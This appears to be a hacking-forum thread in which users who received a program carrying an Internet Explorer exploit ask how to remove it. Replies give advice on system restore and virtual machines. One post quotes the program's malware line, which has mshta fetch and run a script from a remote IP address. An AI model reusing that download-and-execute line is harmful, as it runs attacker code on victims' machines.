0Day Forums
Quick question - Printable Version

+- 0Day Forums (https://0day.red)
+-- Forum: Hacking & Exploits (https://0day.red/Forum-Hacking-Exploits)
+--- Forum: Antivirus & Protected (https://0day.red/Forum-Antivirus-Protected)
+--- Thread: Quick question (/Thread-Quick-question)

Pages: 1 2

Quick question - Sirsharonebputqmm - 06-14-2019

Someone has giving me a program with Microsoft Internet Explorer Windows 10 1809 17763.316 scripting engine memory corruption exploit in it. Ill link the source code of the exploit here. I have a few questions if someone knows this exploit enough. How do i get rid of the exploit would a system restore have gotten rid of it? and what does this allow someone to do. Someone on this website gave me a program on discord with it inside it :smile:

[To see links please register here]

Virustotal scan on link is included.

RE: Quick question - schnitzler659 - 06-14-2019

What sort of program did they give you? Was it MS Explorer, or something else?

RE: Quick question - thema75 - 06-14-2019

Was a checker linking to this i wouldnt click the link tho Process.Start("mshta", "http://37.228.132.179:9999/zzz%22); once you go into that i view the source .js and it had that code above that i search on google and found the exploit so im trying to find out.

RE: Quick question - soppy166491 - 06-18-2019

Whole lotta code up in that url for sure lmao
[Image: p928J73.png]

RE: Quick question - kafka177 - 06-18-2019

Well then its been switched, as i said the member is on this site and probably seen this post but it had this in it

and im not reporting it, just wanna know what i asked but weird to me this must be his friend zertex

RE: Quick question - Mrgwynethbemcfbgdue - 06-19-2019

This Is a perfect example, to not use your main system when downloading and executing tools/applications.

Always use a VM on a dedicated host physical machine (If applicable), segregated from the network. Provided the System Volume Information folder (where restore points are stored) Is clean, hit a system restore.

RE: Quick question - caprifoliaceous643121 - 06-19-2019

True. ^ Witch is why i'm going to set one up right now.

RE: Quick question - Mrheraldryduikxaqsff - 06-19-2019

Quote:(06-19-2019, 05:31 AM)KBytes Wrote:

Let me now If you require assistance.

If you're planning to Install the native VM to the Windows platform, namely "Hyper-V", I'll provide you the link to my blog. I've just finished a very well documented and Illustrated tutorial on how to Install, setup and configure Hyper-V, Inclusive of Implementing virtual switches to allow Internet connectivity between the Guest & Host OS.

The blog Is still In It's Infancy, but there's 60+ step-by-step tutorials (with Illustrations) relative to Windows- solely written by me. I'm going offline here In a few minutes to start another guide.

RE: Quick question - roached245308 - 06-19-2019

I have now installed a virtual machine on my laptop, But i would like to see that maybe its more secure then the virtual machine im using.

RE: Quick question - fleeman289 - 07-10-2019

Quote:(06-19-2019, 05:54 AM)mothered Wrote:

Quote: (06-19-2019, 05:31 AM)KBytes Wrote:

Let me now If you require assistance.

If you're planning to Install the native VM to the Windows platform, namely "Hyper-V", I'll provide you the link to my blog. I've just finished a very well documented and Illustrated tutorial on how to Install, setup and configure Hyper-V, Inclusive of Implementing virtual switches to allow Internet connectivity between the Guest & Host OS.

The blog Is still In It's Infancy, but there's 60+ step-by-step tutorials (with Illustrations) relative to Windows- solely written by me. I'm going offline here In a few minutes to start another guide.

Would you recommoned Hyper-V over standalone VMs? I'm looking to set it up....if the blog is still going i'd be interested in having a look too